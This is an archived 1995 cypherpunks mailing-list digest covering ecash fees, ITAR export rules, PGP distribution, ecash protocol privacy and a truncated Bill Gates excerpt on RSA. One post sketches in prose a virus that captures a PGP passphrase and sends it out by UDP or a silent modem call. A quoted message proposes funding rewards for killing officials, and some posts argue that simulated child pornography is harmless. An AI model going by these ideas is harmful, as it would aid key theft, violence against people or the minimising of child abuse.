-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

------- FORWARD, Original message follows -------

Date: Friday, 24-Nov-95 03:38 PM

From: Mark Twain Ecash Support \ Internet:    (mtwain at netcom.com)
To:   J. Kent Hastings         \ Internet:    (zeus at pinsight.com)

Subject: Re: using ecash

> During the "play money" beta test, I saw "BEGIN E-CASH PAYMENT" messages
> that looked like a PGP format.

> I'd like to know if the Mark Twain "real money" US Dollar software has
this
> feature, too.

Mark Twain Ecash does allow for ASCII email payments.

> The "heavy user" personal account has a 3 percent fee to withdraw, but
> verify that just to make sure.

With a Heavy User account you can move a hundred USD in or out of the  Mint
fee of charge.

For the second hundred USD the rate is 3%, but the money movement fee  is
counted against your monthly fee of $2, so you only pay 3$ - 2$ =  1$ for
the second hundred.


-- Mark Twain Ecash Support
   <mailto:support at marktwain.com>
   <http://www.marktwain.com/ecash.html>


------- FORWARD, End of original message -------







From gjeffers at socketis.net  Fri Nov 24 14:49:25 1995
From: gjeffers at socketis.net (Gary Jeffers)
Date: Sat, 25 Nov 1995 06:49:25 +0800
Subject: establishing trust
Message-ID: <199511241600.KAA30794@mail.socketis.net>


            RE: establishing trust

   Question: What's a WEB OF TRUST with STATE agents in it?
   Answer: - a DRIFTNET!  U heard it here first. :-)

THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY.
The United States "Federal" Government - We'll be even more American
without it.

                                           PUSH EM BACK! PUSH EM BACK!
                                           WWWAAAYYYY  BBBAAACCCCK!
                                           BBBEEEAAATTTT  STATE!

                                           Gary Jeffers







From dl at hplyot.obspm.fr  Fri Nov 24 14:50:35 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Sat, 25 Nov 1995 06:50:35 +0800
Subject: Export control FTP servers
In-Reply-To: <9511232220.AA19031@hplyot.obspm.fr>
Message-ID: <9511241106.AA20922@hplyot.obspm.fr>


Mark M. writes:
 > I just used the following simple shell script.  Not very secure but does
 > the trick for the purposes of export controlled directories.
 > #!/bin/sh
 > (date; uptime; ps -e; netstat; set) | md5sum
That one is quite good, you could also feed $1 which would be the
previous "pass".
Btw I'd suggest that you use netstat -n if you don't want it to take
ages to resolve all the IP->name.


dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

PLO [Hello to all my fans in domestic surveillance] Mossad FSF class
 struggle explosion hack





From zerucha at shell.portal.com  Fri Nov 24 14:58:50 1995
From: zerucha at shell.portal.com (Thomas E Zerucha)
Date: Sat, 25 Nov 1995 06:58:50 +0800
Subject: Virus attacks on PGP
In-Reply-To: <Pine.LNX.3.91.951124152257.5757A-100000@micro.internexus.net>
Message-ID: <Pine.SUN.3.90.951124143054.15604C-100000@jobe.shell.portal.com>


On Fri, 24 Nov 1995, Laszlo Vecsey wrote:

> > > Where can one get PGP burnt into cdrom? Or the equiptment to do it
> > 
> > If you can wait a while, TERENA (UKERNA, SURFnet, etc) are producing a PGP CD
> > at the start of next year ...
> 
> Would PGP on CD-ROM truely gaurantee a corrupt/virus free executable? A 
> virus already running in memory could tamper with what it's doing, 
> perhaps extracting the necessary keys and dumping them to a log file.
> This would be especially dangerous on a UNIX system where many people 
> might be using PGP, thinking it is secure.
> 
> I think the only way to be safe is to actually boot up off of the CD-ROM, 
> and hope that the hardware in your computer physically hasn't been 
> tampered with :)
> 

My original post mentioned two things, the other was to cross-compile the 
sources.  Maybe do it on 3 different systems (e.g. Sun, HP and DEC), and 
compare the binaries, then burn a CD.  A virus would have to be very 
versatile to infect multiple platforms and insert code for another.

It would also be silly for a virus to just dump keys when PGP runs, it 
would be far easier to look for any occurance of secring.pgp, and mail 
it, and/or monitor when it was opened and record keystrokes.  And log files
must go somewhere.

I don't know if I mentioned, but I keep PGP and my keys on pcmcia memory 
cards that aren't in the system at the same time as a network or modem 
card.  Moreover I can also simply use the DOS version (I use linux to 
communicate) - It would require quite an effort to create a virus that 
would work and pass data across the required OS problems and not break 
with the twice a week kernel-level changes :).

ViaCrypt also has a PCMCIA implementation of pgp, and it should be fairly 
easy to implement in an ASIC, or small embedded micro.  That would be 
much harder to compromise.  Of course anything so useful commercially 
woudl be the subject of our legal system.

It takes quite an effort to create a complex virus to do this.  It 
reminds me of the Glomar Challenger that was used to recover the remains 
of a russian sub (my memory is somewhat faulty).  Such a virus would 
require a great investment in time and money.  What target would be worth it?
Many otherwise feasible things aren't economically pracitcal.

zerucha at shell.portal.com -or- 2015509 on MCI Mail
  finger zerucha at jobe.portal.com for PGP key






From scs at lokkur.dexter.mi.us  Fri Nov 24 15:05:21 1995
From: scs at lokkur.dexter.mi.us (Steve Simmons)
Date: Sat, 25 Nov 1995 07:05:21 +0800
Subject: Sun speaks out - but not to the cypherpunks
In-Reply-To: <199511050203.SAA01370@jobe.shell.portal.com>
Message-ID: <495i89$1db@lokkur.dexter.mi.us>


anonymous-remailer at shell.portal.com writes:

>The CBC (Canadian Broadcasting Corporation) detailed a software
>code problem in one of AECL's (Atomic Energy of Canada Limited's)
>instruments which deliver penetrating radiation.

>The software which controlled the radiation dose, would periodically
>override the oncologist's calibration and deliver a radiation dose
>100 times what was prescribed. This software "bug" literally killed
>wherever the machine was in use.

 . . .

>Or alternatively, another lesson could be pulled out: To avoid this
>problem, ensure that your code is mathematically provable or utilize
>appropriate hardware overrides.

If this is the same case I read of two or three years back, it
should be noted that not one but three safety interlocks had to fail
simultaneously -- one human, one hardware, one software.  The software
glitch has gotten the biggest play in the press, but it was not the
sole cause of the problem.
-- 
Yea, the heavens shall open and the NP-complete solution given forth.
ATT executives shall give birth to two-headed operating systems, and 
copyrights shall be expunged.  The voice of the GNU shall be heard,
but the faithless will be without transcievers.





From x93ojg at juliet.stfx.ca  Fri Nov 24 15:09:21 1995
From: x93ojg at juliet.stfx.ca (Still)
Date: Sat, 25 Nov 1995 07:09:21 +0800
Subject: (PGP in Canada) another new question.
In-Reply-To: <9511241348.ZM19179@squirrel.com>
Message-ID: <Pine.A32.3.91.951124190148.83732B-100000@juliet.stfx.ca>


Is pgp able to be put on a university network and used by all the 
students?  I am again referring to use in Canada.

--

	     T H E  M A N , T H E  M Y T H , T H E  L E G E N D . 
******************************************************************************
* Dylan "Still" Boudreau	* Knowledge is proud that she knows so much; *
* Internet: x93ojg at stfx.ca	* Wisdom is humble that she knows no more.   *
******************************************************************************
*       Homepage: http://juliet.stfx.ca/people/stu/x93ojg/welcome.html       *  
******************************************************************************

		When someone says, "That's a good question." 
		 You can be sure it's a lot better than the 
		         answer you're going to get.







From moroni at scranton.com  Fri Nov 24 16:04:37 1995
From: moroni at scranton.com (Moroni)
Date: Sat, 25 Nov 1995 08:04:37 +0800
Subject: crypto for porno users
In-Reply-To: <199511232149.PAA21305@khijol>
Message-ID: <Pine.LNX.3.91.951124151506.7425B-100000@prufrocks.scranton.com>


I wish we could get off the subject of the kiddie porn , it makes me 
wonder what people on this list are doing when they are not mailing out 
letters. Not to flame ,BUT it is such a serious issue and we all as 
adults and approaching adults should not treat it as an academic issue . 
It is the most victimizing of all crimes and I think of speak for some of 
us when I say that it would be better if we all found a way to get back 
to discussing the problems of cryptography as related to we not 
pornographers.

               Thanks in Advance 
                     moroni






From Matthew.Sheppard at Comp.VUW.AC.NZ  Fri Nov 24 16:25:13 1995
From: Matthew.Sheppard at Comp.VUW.AC.NZ (Matthew James Sheppard)
Date: Sat, 25 Nov 1995 08:25:13 +0800
Subject: "lack" of export control rules
In-Reply-To: <Pine.BSD.3.91.951124054104.12402A-100000@usr4.primenet.com>
Message-ID: <199511250017.NAA16018@paramount.comp.vuw.ac.nz>


The shadowy figure took form and announced "I am attila and I say ...
> On Thu, 23 Nov 1995, sameer wrote:
>  a> The feds have never established a general policy.
> 
>     in other words, business as usual with the Feds. If there is no "book"
> on what is or is not legal v/v ITAR, and the agency responsible will not
> communicate, it empirically says:  "...well, be reasonable to meet the
> intent of the law, but we will not tell you what is really expected;
> however, if, in the futute, we decide what we really want, we will bust
> you if you did not fully comply despite your good intentions --and, if
> that does not fly, we'll charge you with conspiracy...." 

Just had an idea for Netscapes case.  If we suppose that the ITAR
governors ever managed to agree on a purely electronic based, export
controlled distribution method then Netscape can write a Java applet
or LiveScript to perform the task.  This would mean a *click here to
download* interface and bypass the obfuscated process that dogs MIT
pgp.

--
                                          <URL:http://www.comp.vuw.ac.nz/~matt>
                 |~    |~
             |~ o|    o|
       ('<  o| 
      ,',)   
     ''<<    
     ---""---





From attila at primenet.com  Fri Nov 24 17:31:24 1995
From: attila at primenet.com (attila)
Date: Sat, 25 Nov 1995 09:31:24 +0800
Subject: real life problems with ITAR (was Spam the Sign!)
In-Reply-To: <m0tJ1o2-0008zJC@pacifier.com>
Message-ID: <Pine.BSD.3.91.951124185244.23968A-100000@usr1.primenet.com>


On Fri, 24 Nov 1995, jim bell wrote:

> 
> Attila at primenet.com said:
> 
> >   On Thu, 23 Nov 1995, jim bell wrote: 
> > 
> >> I very much agree with the direction you appear to be headed in.  It seems
> >> to me that Netscape should have no problem devising some sort of scenario in
> >> which such a program eventually gets onto the nets, but in a way that is
> >> squeaky clean, at least for THEM.  
> >> 
> >> 
> >> In addition, why should they even need to write the encrytion part of their
> >> software IN the US?  It occurs to me that one way to do this might be to
> >> send one of their programmers to a conveniently-located place, such as
> >> Vancouver BC , Montreal Canada, or a few other nearby places, with a great
> >> deal of fanfare, and tell him to "write some crypto."  He does, and brings
> >> it back into the US with him, leaving a copy of it "outside" the country for
> >> international distribution.
> >> 
> >    <attila sez>  I think they have that one covered --not only is it 
> >violation of ITAR's intent to send a programmer out of the U.S.
> 
> Well, don't assume that because something's a "violation of ITAR's INTENT"
> it is actually a violation of ITAR.    It can't be assumed that ITAR is
> _perfect_:  That it actually prohibits every activity the government that
> wrote it didn't like.
>
    	<#2 attila sez> the problem with the U.S. government is the U.S. 
    conspiracy laws. If they have insufficient evidence to convict on 
    "actual" violations, they use the concept that you were _part_ of a
    conspiracy to _circumvent_ the laws. 

 
> , but is 
> >illegal to hire a foreign national to program for your non-U.S. products.
> 
> Sure about this?!?
>
	<#2 attila> I dont have to push all my data into glimpse to find 
    the article, but it's there. there are other sources, but not open to 
    discussion; sorry.
 
> >    the test is going to be with someone like Sun who "bought" a group of 
> >Russian crypto programmers and left them in Russia.  Now, the problem 
> >with ITAR is that if you import that code, you can not then export the 
> >code since it is now covered by ITAR.
>
	<#2 attila> I guess I should have stated it better: what they are 
    trying to do, for instance with Sun, is treat that foreign entity as
    if it was a direct operating unit of the parent U.S. company.  OK,
    fine, you hire your Russian crypto programming team and my take from
    several conversation is that it is a _good_ team, but the U.S. wants
    to enforce the rule that the code produced in Russia for a "parent"
    American company is _a U.S. product_!  --in other words, the foreign
    division can not sell it overseas.  So far, noone has been charged, 
    but my sources say Sun is the most likely. 
	Either way you slice it, Sun is committed to world wide 
    compatability, and with that goes security, including worldwide NFS.
    You figure it out... 
	what is the alternative for Sun, or Netscape? yup, close down in 
    the U.S. and go to Holland --oh, they can keep their sales offices in
    the U.S.  --but they will be paying import duty, or they will end up
    contracting local assembly.  closing down in the U.S. literally means
    off NASDAQ.
	the fact that our government is effectively totalitarian is their 
    paranoia -only paranoia that they might miss something or that they
    are not in total control stimulates the kind of attack on the 
    Constitution that is going on. 
 
> I didn't say that the code would ever be "re-exported":  A copy would be
> brought into the US for domestic use, and everyone else outside the border
> would get their own copy from an outside server. 
> 
> 
> >    secondly, it appears there is a move afoot to make it an ITAR 
> >violation to hire the foreign nationals to circumvent ITAR --basically, 
> >the Feds want to stop cryptography _everywhere_, including telling 
> >Russians they can not work for U.S. companies!  Just where do they think 
> >they are getting off?
> 
> It is for this kind of problem that I "invented" my concept of
> "Assassination Politics":  If everybody pissed off at this situation was
> willing to donate $10 to a fund to reward the deaths of a few government
> officials responsible for ITAR, I can well imagine that this would shake
> them up a bit.  
> 

Robert East <viking at pacifier.com> said
 > What all these postings show is the desire of the federal government to
 > attempt to control crypto.  In the past, they were, virtually, the only
 > source for encryption equipment and/or computer code.  Well, now that
 > isn't true anymore.  They came up with ITAR regulations to attempt to
 > put a lid on crypto and other technological developments but it is like
 > trying to use a sieve to carry water.  There are many programmers and
 > others who will produce code and make sure that it is exported
 > anonymously just to prove that the government isn't "All Powerful."
 > 
     	<#2 attila> yes, that is true, but that is not the point --we have
    been doing that ever since I have been involved in crypto. 20 years
    ago when the heat was on me, somebody else dumped it whereever. even
    simple things get the Feds' dander up and they need an example; if I
    had not had a U.S. Senator (and I never even met the gentleman) in my
    corner, I would have gone down for the big one in '76. 
	Look at the problem Phil Zimmerman is having --several hundred
    thousand dollars in legal fees so far --for what; the original
    algorithms were published in Scientific American in Oct 77 --and then
    there was _silence_.  Just try and find a copy of that issue in a
    public library; most were pulled. 
	I may have been really pissed off after a couple thugs in trench
    coats knocked on _my_ door early morning to read me my rights for
    "exporting technology to a foreign power," or being detained in a
    little white room for 36 hours at immigration after speaking at a
    conference in Sweden and another in Copenhagen that was highly
    critical of U.S. policy --and discussing advanced hardware techniques
    for emulating BCD machines in not BCD bit slices --just happened to
    match the old Burroughs 3500s which were in all the missle silos
    --now, whatever gave them that idea? :)
	Ask Phil Zimmerman if he would do it again-- I will, because I
    don't give a shit, am old enough that I can afford to have ethics, and
    I am a Jeffersonian democrat; jefferson must be spinning over the 
    speed of light over what the _conservatives_ would do, let alone what
    the liberal Democrats will bleed and do, like Clinton, or Hillary and
    her lez buddy Thomases, who, unpaid, occupies an office in the front
    row (she was the one who was seen carrying Foster's files upstairs to
    Hillary). 

 > At some point in time the feds are going to put their collective tails
 > between their legs and go slink away to some convenient hiding place. 
 > I think it's a case of Pandora's box being opened with no way of
 > reclosing it. 
 >
	<#2 attila>  naw. they're too stupid and too paranoid to give up. 
    the U.S. has not had a free election since Lincoln's first term and
    Stanton wrote the War Powers Act which, to this day, has not been
    repealed. Russia has more democracy than the U.S. --even if they are
    totally SNAFU.  The U.S. hasn't degenerated to Hussein or the
    Ayatollah, but if NSA and Freeh have their way, it might. As Will
    Rogers said in the early 30s: "...go to the circus? why would I want 
    to do that when Congress is in session?"  or Mark Twain, who said
    something to the effect:  "...the only natural criminal class in
    America is our Congress...."
	it's all a matter of control, or the appearance of being in 
    control. No, they cant bust all of us, but they can set some pretty 
   painful and expensive example of a few of us.  ...been there, and done
   that! 

 > Bob






From s1113645 at tesla.cc.uottawa.ca  Fri Nov 24 18:06:54 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Sat, 25 Nov 1995 10:06:54 +0800
Subject: [rehash] Re: crypto for porno users
In-Reply-To: <199511241535.JAA30731@mail.socketis.net>
Message-ID: <Pine.3.89.9511242032.A16013-0100000@tesla.cc.uottawa.ca>


Watch the cpunks go round and round and round and...

On Fri, 24 Nov 1995, Gary Jeffers wrote:

>    I know little of the theory of Dining Cryptographers but I would think
> that a good implementation of it would make infiltrators useless. I will
> leave it for other Cypherpunks to discuss the mechanics (specific and
> general) for actually doing this.

Dining Cryptographers nets (aka DC-nets) are the whole idea behind the
type 2 anon remailers like Mixmaster, and the remailernet in general.
You'll find a lot on this in the archives, the ftp site (which has Chaum's
DC article and a good explanation by Tim May) and a few peoples' pages. 
(I think they're mostly pointed to in the pages I list) 

You'll find Mixmaster at <http://obscura.com/~loki/Welcome.html>
Wei Dai posted some articles a few months ago about traffic analysis
of such remailers. He still has one of them at 
<http://www.eskimo.com/~weidai>
Sameer also has a two-way encrypted-command remailer. Check out 
<http://www.c2.org> for details.
The archives are at <http://www.hks.net/cpunks/index.html> (I realize
this has been posted n zillion times)

Wasn't there a DC-net mailing list once upon a time? (Tim mentions it in some
of his writings) Did this wither away or merge into the remailer-ops list?







From markm at omni.voicenet.com  Fri Nov 24 19:42:46 1995
From: markm at omni.voicenet.com (Mark M.)
Date: Sat, 25 Nov 1995 11:42:46 +0800
Subject: Virus attacks on PGP
In-Reply-To: <Pine.LNX.3.91.951124150849.7425A-100000@prufrocks.scranton.com>
Message-ID: <Pine.LNX.3.91.951124222957.107A-100000@localhost>


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 24 Nov 1995, Moroni wrote:

> 
>     Where can one get PGP burnt into cdrom? Or the equiptment to do it
>              Thanks in advance
>                  moroni
> 
> 
> 

I remember seeing in computer catalog a device that can burn data into a
cdrom and it even supplies blank cd's.  Unfortunately, I cannot remember
the name of the catalog.  It might have been _Tiger Software_ or some
similar catalog.  I do know that the technology is available.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp, a Pine/PGP interface.

iQCVAwUBMLaOlrZc+sv5siulAQGpUgQAnj4I6lhgOX6Q6U9PctJn4pFcW7ncRguT
Npv8w7GR5TzBY7fejmiwVGqjSkw86trCvJwwR42azd2XAYU9t8zlSNO/r+dbqGQY
1mmA5RGUAuP5FVvVKoJqq0eYBhixe0E+G9/hBftqNlNAsIEuQ+sRd1MkoR1zu4R+
27+lBhQ72as=
=j0/5
-----END PGP SIGNATURE-----


`finger -l markm at omni.voicenet.com` for public key and Geek Code
Public Key/1024: 0xF9B22BA5 BD 24 D0 8E 3C BB 53 47  20 54 FA 56 00 22 58 D5
Homepage URL:http://www.voicenet.com/~markm/





From jirib at sweeney.cs.monash.edu.au  Fri Nov 24 21:26:25 1995
From: jirib at sweeney.cs.monash.edu.au (Jiri Baum)
Date: Sat, 25 Nov 1995 13:26:25 +0800
Subject: crypto for porno users
In-Reply-To: <01HY1C15AVLC8WYI84@mbcl.rutgers.edu>
Message-ID: <199511250514.QAA13966@sweeney.cs.monash.edu.au>


-----BEGIN PGP SIGNED MESSAGE-----

Hello E. ALLEN SMITH" <EALLENSMITH at ocelot.Rutgers.EDU>
  and moroni at scranton.com
  and cypherpunks at toad.com

Allen wrote:
> From: IN%"moroni at scranton.com"  "Moroni" 24-NOV-1995 14:52:11.13
> 
> >I wish we could get off the subject of the kiddie porn , it makes
> >me wonder what people on this list are doing when they are not
...

I believe that the thread originally was on pornography in  
general, not any particulary type...

One reason to talk of it might be that users of legitimate pornography
(non-violent erotica, X, whatever you call it) are a likely adopter
of privacy technology (encryption, e cash, anon, etc).

They may also be a sufficiently numerous group to affect elections,
should one or the other party actually be better than the other.

Particularly in Australia, where I understand X-rated material
may be sold only in the Territories, and anyone living in one of
the States has to drive over or mail-order.

<offtopic>
...
> governmental censorship. Consequently, I would like to give two
> counterarguments to the idea that child pornography is not
> something that should be cryptographically protected.
... [age of consent; generated without children] ...

One can even imagine situations with real live child pornography...
Should one be forbidden from distributing pictures of oneself
when one was younger? 
</offtopic>

However, I speak from assumptions and newspaper reports, not
personal experience, so all of the above may be way off :-)

Adiau - Jiri
- --
If you want an answer, please mail to <jirib at cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMLamJSxV6mvvBgf5AQGuagQAhGbN/16ALjnDKKJMlPpfbctBkXt7gpZl
zh+lx+w+u0jIYG6whmCwpPnSPpo1MjorHvhZ/5B/h+WonXYfSw+ZFo0ziOCtIh5S
L0Jyp2LnJaU4mqggVwqMfBVlQ31Ax3sSuxxxI2YhQygrx4BauPhHMnJJnDxs7Uj0
qKFVGTK53WI=
=m8px
-----END PGP SIGNATURE-----





From norm at netcom.com  Fri Nov 24 22:18:47 1995
From: norm at netcom.com (Norman Hardy)
Date: Sat, 25 Nov 1995 14:18:47 +0800
Subject: Virus attacks on PGP
Message-ID: <acdc55c10202100472f8@DialupEudora>


At 2:46 PM 11/24/95, Thomas E Zerucha wrote:
....

>I don't know if I mentioned, but I keep PGP and my keys on pcmcia memory
>cards that aren't in the system at the same time as a network or modem
>card.  Moreover I can also simply use the DOS version (I use linux to
>communicate) - It would require quite an effort to create a virus that
>would work and pass data across the required OS problems and not break
>with the twice a week kernel-level changes :).
....
Yes it would be hard. When you choose your own protection as above an
opponent would have to mount a significant effort just to get your stuff.
....
>It takes quite an effort to create a complex virus to do this.  It
>reminds me of the Glomar Challenger that was used to recover the remains
>of a russian sub (my memory is somewhat faulty).  Such a virus would
>require a great investment in time and money.  What target would be worth it?
>Many otherwise feasible things aren't economically pracitcal.

Yes, but if your particular habits became widespread, an intelligence
agency could amortize the virus effort across many victims.

Here is just one such complicated virus:
Sit in the OS watching for PGP to be launched. Patch PGP on the way in. The
patch writes to disk the location and password for the secure key ring.
Concurrently the virus watches for there to be IP service and sends the
disk information as a UDP.
Alternatively the virus waits for idle time, (screen saver time) and dials
an 800 number having turned off the modem speaker. But don't send the same
data twice!

There is a significant hazard for the virus producer here if someone finds
the code and learns the 800 number. I am sure that the Telco would help
locate the physical phone to which the 800 number led. UDP provides more
ways to pigeon drop the secret so as to protect the reader of that data.
Perhaps you can send the UDP to the NY-Times (or to your favorite enemy)
over a line that you are tapping. The NYT will discard it and no one is the
wiser. The virus is then anonymous.







From dlv at bwalk.dm.com  Fri Nov 24 23:18:27 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 25 Nov 1995 15:18:27 +0800
Subject: crypto for porno users
In-Reply-To: <01HY1C15AVLC8WYI84@mbcl.rutgers.edu>
Message-ID: <PVV4eD33w165w@bwalk.dm.com>


"E. ALLEN SMITH" <EALLENSMITH at mbcl.rutgers.edu> writes:
>      The second is that given new image modification technologies,
> it is possible to produce what will seem child pornography, but
> with no actual harm done to children. In some ways, this product
> may reduce harm to children in some respects by providing a
> "competing product" to actual child pornography, and thus
> discourage its manufacture.
...

I recall that a man was recently convicted in Canada on child pornography
charges (sorry, can't recall the exact statute name) for, basically, drawing
naked kids on his computer. No children were harmed, or otherwise involved in
producing the material, but the courts found it to be child pornography.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From jirib at sweeney.cs.monash.edu.au  Fri Nov 24 23:55:53 1995
From: jirib at sweeney.cs.monash.edu.au (Jiri Baum)
Date: Sat, 25 Nov 1995 15:55:53 +0800
Subject: ecash protocol: Part 1
In-Reply-To: <199511212146.NAA11456@cory.EECS.Berkeley.EDU>
Message-ID: <199511250744.SAA14637@sweeney.cs.monash.edu.au>


-----BEGIN PGP SIGNED MESSAGE-----

Hello Ian Goldberg <iang at cory.EECS.Berkeley.EDU>
  and cypherpunks at toad.com

...
> Last week, I was taking a look at the ecash protocol (no, I don't have a copy;
> I have a binary, which I can't even run...).  
...

Sounds like good work!

...
> I guess the important bit is that the payee, the item being bought,
> and the cost are sent _in the clear_.  Some of the people I've talked
> to think this is a huge privacy breach, and some don't.  You all can
...

Yeah, it probably is. Then again you can probably use a dummy
description, no?

However, that doesn't get around the fact that anyone intercepting
the packet who knows where it came from will immediately see straight
through payer anonymity.

...
>    - Ian "Why exactly isn't DigiCash releasing the protocol?  What about
> 	    the source?"
...

A Source Close To Digicash That Did Not Wish To Be Quoted
once described them as 'crown jewels' (competitive advantage).

ASCTDTDNWTBQ then appealed to Digicash's track record.

I certainly hope that this genuinely is not Digicash's official opinion.


Thank you for once again showing the futility of security by obscurity.

Jiri
- --
If you want an answer, please mail to <jirib at cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMLbIjixV6mvvBgf5AQFKiwP/fJKIZnRM4HQzkdzYNTTDPP/CZNGlLWQI
UnA4la2134SoBde/hPsSiniuWBlESU8rpbA3IX+mygh50x/4CSb86VClvgIF8xKp
XFRwXljxer2dqKV3troMYFQfYWrUoj6NXTJIRQWwBJ6ilHcXE1OWtHWGPgAB9/Gv
79z3R4njwmw=
=OPp0
-----END PGP SIGNATURE-----





From weld at l0pht.com  Sat Nov 25 04:31:37 1995
From: weld at l0pht.com (Weld Pond)
Date: Sat, 25 Nov 1995 20:31:37 +0800
Subject: CJR_war
Message-ID: <Pine.BSD/.3.91.951124222618.23929A-100000@l0pht.com>




      Weld Pond   -  weld at l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio






From nobody at REPLAY.COM  Sat Nov 25 07:15:25 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Sat, 25 Nov 1995 23:15:25 +0800
Subject: Gates: Jiffy Iffy Crypto
Message-ID: <199511251506.QAA03450@utopia.hacktic.nl>



>From "The Road Ahead," by Bill Gates, with Nathan
Myhrvold and Peter Rinearson, Viking, 1995.


[Paths to the Highway, pp. 106-111]

Governments have long understood the importance of
keeping information private, for both economic and
military reasons. The need to make personal, commercial,
military, or diplomatic messages secure (or to break into
them) has attracted powerful intellects through the
generations. It is very satisfying to break an encoded
message. Charles Babbage, who made dramatic advances in
the art of code breaking in the mid-1800s, wrote:
"Deciphering is, in my opinion, one of the most
fascinating of arts, and I fear I have wasted upon it
more time than it deserves." I discovered its fascination
as a kid when, like kids everywhere, a bunch of us played
with simple ciphers. We would encode messages by
substituting one letter of the alphabet for another. If
a friend sent me a cipher that began "ULFW NZXX," it
would be fairly easy to guess that this represented "DEAR
BILL," and that U stood for D, and L for E, and so forth.
With those seven letters it wasn't hard to unravel the
rest of the cipher fairly quickly.

Past wars have been won or lost because the most powerful
governments on earth didn't have the cryptological power
any interested junior high school student with a personal
computer can harness today. Soon any child old enough to
use a computer will be able to transmit encoded messages
that no government on earth will find easy to decipher.
This is one of the profound implications of the spread of
fantastic computing power.

When you send a message across the information highway it
will be "signed" by your computer or other information
appliance with a digital signature that only you are
capable of applying, and it will be encrypted so that
only the intended recipient will be able to decipher it.
You'll send a message, which could be information of any
kind, including voice, video, or digital money. The
recipient will be able to be almost positive that the
message is really from you, that it was sent at exactly
the indicated time, that it has not been tampered with in
the slightest, and that others cannot decipher it.

The mechanism that will make this possible is based on
mathematical principles, including what are called
"one-way functions" and "public-key encryption." These
are quite advanced concepts, so I'm only going to touch
on them. Keep in mind that regardless of how complicated
the system is technically, it will be extremely easy for
you to use. You'll just tell your information appliance
what you want it to do and it will seem to happen
effortlessly.

A one-way function is something that is much easier to do
than undo. Breaking a pane of glass is a one-way
function, but not one useful for encoding. The sort of
one-way function required for cryptography is one that is
easy to undo if you know an extra piece of information
and very diffficult to undo without that information.
There are a number of such one-way functions in
mathematics. One involves prime numbers. Kids learn about
prime numbers in school. A prime number cannot be divided
evenly by any number except 1 and itself. Among the first
dozen numbers, the primes are 2, 3, 5, 7, and 11. The
numbers 4, 6, 8, and 10 are not prime because 2 divides
into each of them evenly. The number 9 is not prime
because 3 divides into it evenly. There are an infinite
number of prime numbers, and there is no known pattern to
them except that they are prime. When you multiply two
prime numbers together, you get a number that can be
divided evenly only by those same two primes. For
example, only 5 and 7 can be divided evenly into 35.
Finding the primes is called "factoring" the number.

It is easy to multiply the prime numbers 11,927 and
20,903 and get the number 249,310,081, but it is much
harder to recover from the product, 249,310,081, the two
prime numbers that are its factors. This one-way
function, the difficulty of factoring numbers, underlies
an ingenious kind of cipher: the most sophisticated
encryption system in use today. It takes a long time for
even the largest computers to factor a really large
product back into its constituent primes. A coding system
based on factoring uses two different decoding keys, one
to encipher a message and a different but related one to
decipher. With only the enciphering key, it's easy to
encode a message, but deciphering it within any practical
period of time is nearly impossible. Deciphering requires
a separate key, available only to the intended recipient
of the message -- or, rather, to the recipient's
computer. The enciphering key is based on the product of
two huge prime numbers, whereas the deciphering key is
based on the primes themselves. A computer can generate
a new pair of unique keys in a flash, because it is easy
for a computer to generate two large prime numbers and
multiply them together. The enciphering key thus created
can be made public without appreciable risk, because of
the difficulty even another computer would have factoring
it to obtain the deciphering key.

The practical application of this encryption will be at
the center of the information highway's security system.
The world will become quite reliant on this network, so
it is important that security be handled competently. You
can think of the information highway as a postal network
where everyone has a mailbox that is impervious to
tampering and has an unbreakable lock. Each mailbox has
a slot that lets anyone slide information in, but only
the owner of a mailbox has the key to get information
out. (Some governments may insist that each mailbox have
a second door with a separate key that the government
keeps, but we'll ignore that political consideration for
now and concentrate on the security that software will
provide.)

Each user's computer or other information appliance will
use prime numbers to generate an enciphering key, which
will be listed publicly, and a corresponding deciphering
key, which only the user will know. This is how it will
work in practice: I have information I want to send you.
My information appliance/computer system looks up your
public key and uses it to encrypt the information before
sending it. No one can read the message, even though your
key is public knowledge, because your public key does not
contain the information needed for decryption. You
receive the message and your computer decrypts it with a
private key that corresponds to your public key.

You want to answer. Your computer looks up my public key
and uses it to encrypt your reply. No one else can read
the message, even though it was encrypted with a key that
is totally public. Only I can read it because only I have
the private deciphering key. This is very practical,
because no one has to trade keys in advance.

How big do the prime numbers and their products have to
be to ensure an effective one-way function?

The concept of public-key encryption was invented by
Whitfield Diffie and Martin Hellman in 1977. Another set
of computer scientists, Ron Rivest, Adi Shamir, and
Leonard Adelman, soon came up with the notion of using
prime factorization as part of what is now known as the
RSA cryptosystem, after the initials of their last names.
They projected that it would take millions of years to
factor a 130-digit number that was the product of two
primes, regardless of how much computing power was
brought to bear. To prove the point, they challenged the
world to find the two factors in this 129-digit number,
known to people in the field as RSA 129:

   114,381,625,757,888,867,669,235,779,976,146,612,010,
   218,296,721,242,362,562,561,842,935,706,935,245,733,
   897,830,597,123,563,958,705,058,989,075,147,599,290,
   026,879,543,541

They were sure that a message they had encrypted using
the number as the public key would be totally secure
forever. But they hadn't anticipated either the full
effects of Moore's Law, as discussed in chapter 2, which
has made computers much more powerful, or the success of
the personal computer, which has dramatically increased
